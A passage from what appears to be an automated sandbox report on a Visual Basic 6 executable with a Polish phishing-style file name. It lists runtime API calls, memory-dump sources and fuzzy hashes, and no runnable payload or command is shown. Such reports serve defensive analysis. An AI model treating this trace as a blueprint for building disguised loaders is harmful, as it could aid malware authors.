                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004241F7
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004241FA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424204
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000008,?), ref: 0042420C
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00424218
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042422A
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 00424242
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042425A
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 00424272
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042428A
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242A2
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242BA
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242D2
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 004242EA
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00424309
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424313
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424318
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424326
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424329
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424333
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424338
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424346
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424349
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424353
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424358
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424366
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424369
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424373
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424378
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424386
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424389
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424393
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00424398
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243A6
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243A9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243B3
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004243B8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243C6
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243C9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243D3
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 004243DF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243E9
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243EC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243F6
                                                                                                                                                                                                                                                      • #581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004243FE
                                                                                                                                                                                                                                                      • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 00424404
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000008,?), ref: 0042440B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424419
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042441C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424426
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042442B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424439
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042443C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424446
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00424452
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042445C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042445F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424469
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0042446E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042447C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042447F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424489
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00424495
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042449F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244A2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244AC
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 004244B1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244BF
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244C2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244CC
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004244D8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244E2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244E5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244EF
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004244F4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424502
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424505
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042450F
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042451B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424525
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424528
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424532
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 00424537
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424545
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424548
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424552
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042455E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424568
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042456B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424575
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0042457A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424588
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042458B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424595
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0042459A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245A8
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245AB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245B5
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 004245BA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245C8
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245CB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245D5
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004245E1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245EB
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245EE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245F8
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004245FD
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042460B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042460E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424618
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042461D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042462B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042462E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424638
                                                                                                                                                                                                                                                      • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00424644
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042464E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424651
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042465B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00424665
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042466F
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004247D8
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 0042481F
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00424E2A
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00424E3C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 00424E4E
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00424E58
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00424E60
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00424E6C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00424E74
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00424E77
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00424E87
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,004250AB,?,00000000), ref: 00425084
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00425093
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00425098
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A8
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004250CA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                                                                                                                                                                                      • String ID: $&H68$&HA8$x.@
                                                                                                                                                                                                                                                      • API String ID: 3305104701-3742186716
                                                                                                                                                                                                                                                      • Opcode ID: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
                                                                                                                                                                                                                                                      • Instruction ID: 7b234b66774b24242b66e43e3622a6720749bc198b4922623ead5fbfde0b20dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E013FA71E002289BCB25DF65DD84ADABBB9FF48301F5081EAE10AA6250DF745F85CF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(00000000,6CF8D8B1,6CF8DF85), ref: 0041F894
                                                                                                                                                                                                                                                      • __vbaAryConstruct2.MSVBVM60(?,0040A070,00000011), ref: 0041F8A1
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 0041F8A9
                                                                                                                                                                                                                                                      • __vbaUbound.MSVBVM60(00000001), ref: 0041F8B7
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 0041F8DB
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F8ED
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?), ref: 0041F906
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F914
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0041F92A
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0041127A
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0041F93A
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 0041F94F
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041F95F
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 0041F975
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00405414), ref: 0041F97C
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 0041F9CC
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F9DE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F9FB
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA0C
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041FA29
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA46
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FA57
                                                                                                                                                                                                                                                      • #709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0041FA6E
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FAA5
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FABA
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,?,0000000A), ref: 0041FAE5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,-00000001,0000000A), ref: 0041FAF2
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,-00000001,0000000A), ref: 0041FAFE
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB11
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 0041FB1F
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,0042C250,00000000), ref: 0041FB3F
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,0042C254,00000000), ref: 0041FB50
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0041FB60
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB69
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB8E
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB9D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,-00000001,0000000A), ref: 0041FBC1
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FBCC
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FC36
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCEA
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCFB
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FD43
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60(00000FEE), ref: 0041FD55
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FD76
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 0041FDAA
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 0041FDD8
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FE02
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 0041FE41
                                                                                                                                                                                                                                                      • __vbaUI1I2.MSVBVM60 ref: 0041FE4D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(-00000001,00000FED,00000000), ref: 0041FEAB
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(00000000), ref: 0041FEE3
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FFDF
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00420025
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0042003A
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0042004A
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(-0042C250,00000000), ref: 00420070
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00420095
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 004200A2
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00420159
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$Free$FileMovePut3$Bstr$#631$#516$#648CloseCopyOpenSeek$#570#594#709Construct2DestructExitListOverflowProcUbound
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 380034392-0
                                                                                                                                                                                                                                                      • Opcode ID: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                                                                                                                                                                                      • Instruction ID: 84537c48718631c5227d11dd853d148d1c88204475b6f264efbcfc593f9f6461
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2332CE35A00255CFCB249FA4E8857EDBBB1FF48340F54417AE405A7362DB7898C6CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004172EC
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,?), ref: 0041731F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00417340
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00417349
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417370
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000003,0000000A,00000000), ref: 00417399
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 004173C9
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000002,0000000A,00000000), ref: 004173F1
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00417414
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00417420
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
